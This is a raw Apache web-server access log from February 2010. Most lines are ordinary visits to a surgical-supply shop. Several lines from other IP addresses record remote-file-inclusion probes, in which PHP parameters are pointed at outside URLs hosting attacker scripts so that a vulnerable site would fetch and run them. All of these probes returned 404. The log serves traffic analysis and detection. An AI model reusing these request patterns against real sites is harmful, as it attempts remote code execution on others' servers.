74.118.9.1 - - [23/Feb/2010:00:00:04 -0500] "GET /logs/error_log.Q110012500//board/bbs/delete_all.php?board_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:00:00:06 -0500] "GET /index.php?configFile=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:00:00:06 -0500] "GET /logs/access_log.Q109102000/index.php?configFile=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:00:00:06 -0500] "GET /logs/index.php?configFile=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.28.110.99 - - [23/Feb/2010:00:00:07 -0500] "GET /logs/access_log.Q109121000//admin/spaw/spaw_control.class.php?spaw_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
201.28.110.99 - - [23/Feb/2010:00:00:08 -0500] "GET /logs/access_log.Q109110200//admin/spaw/spaw_control.class.php?spaw_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
208.90.40.126 - - [23/Feb/2010:00:00:16 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01 HTTP/1.1" 200 49497 "http://www.acesurgical.com/rcm6.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:17 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:18 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:18 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:18 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
121.254.172.27 - - [23/Feb/2010:00:00:18 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dotsik.ru///components/com_content/com/sc1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:00:00:22 -0500] "GET /logs/access_log.Q109120700///bbs///////delete_comment.php?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:00:00:22 -0500] "GET ///bbs///////delete_comment.php?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:00:00:22 -0500] "GET /logs///bbs///////delete_comment.php?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:00:00:27 -0500] "GET /logs/error_log.Q109102000/index.php?configFile=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
208.90.40.126 - - [23/Feb/2010:00:00:27 -0500] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
83.222.124.71 - - [23/Feb/2010:00:00:28 -0500] "GET /logs/access_log.Q109053000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.222.124.71 - - [23/Feb/2010:00:00:40 -0500] "GET /logs/access_log.Q109053000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://ssp3.ilawa.pl//components/com_zoom/images/smilies/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.90.40.126 - - [23/Feb/2010:00:00:45 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:45 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG HTTP/1.1" 200 37524 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:47 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:48 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:48 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:48 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:00:48 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233805E3146D8000E2307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
